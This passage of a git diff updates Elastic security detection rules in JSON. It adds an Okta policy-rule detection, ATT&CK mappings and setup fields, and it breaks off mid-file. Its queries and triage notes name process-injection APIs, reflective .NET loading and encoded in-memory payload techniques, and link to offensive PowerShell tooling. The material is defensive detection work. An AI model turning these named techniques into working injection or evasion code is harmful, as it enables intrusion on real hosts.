b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json similarity index 51% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json index 768d69341e71a..8f5673f6e1ebe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Modify an Okta Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:policy.lifecycle.update\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "6731fbf2-8f28-49ed-9ab9-9a918ceb5a45", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -28,9 +47,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json new file mode 100644 index 0000000000000..01892bc3fa4c4 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json @@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls.", + "false_positives": [ + "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization." + ], + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Modify an Okta Policy Rule", + "note": "", + "query": "event.dataset:okta.system and event.action:policy.rule.update\n", + "references": [ + "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "000047bb-b27a-47ec-8b62-ef1a5d2c9e19", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Identity", + "Okta", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json index f03cc4b3f2b06..bd2f8da8af061 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json @@ -14,6 +14,63 @@ "references": [ "https://blog.didierstevens.com/2017/03/20/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2", "severity": "high", @@ -49,5 +106,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json index e7df1b3b051a3..a1e8f4f497a9b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json @@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script,\nwhich can circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script,\nwhich can circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n )\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -79,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json index 79f4f3a85768b..1119611d73deb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json @@ -14,10 +14,23 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the\ndisk. This strategy can circumvent string and file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the\ndisk. This strategy can circumvent string and file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json index ced22c139e48b..d21768d85f9fd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json @@ -14,15 +14,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Process Injection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way,\nlike the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject\npayloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n )\n", + "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way,\nlike the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject\npayloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n )\n", "references": [ "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1", "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1", "https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -62,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json index e370db966e6cc..69fa5b9bd4d70 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json @@ -16,6 +16,53 @@ "references": [ "https://github.com/jxy-s/herpaderping" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": 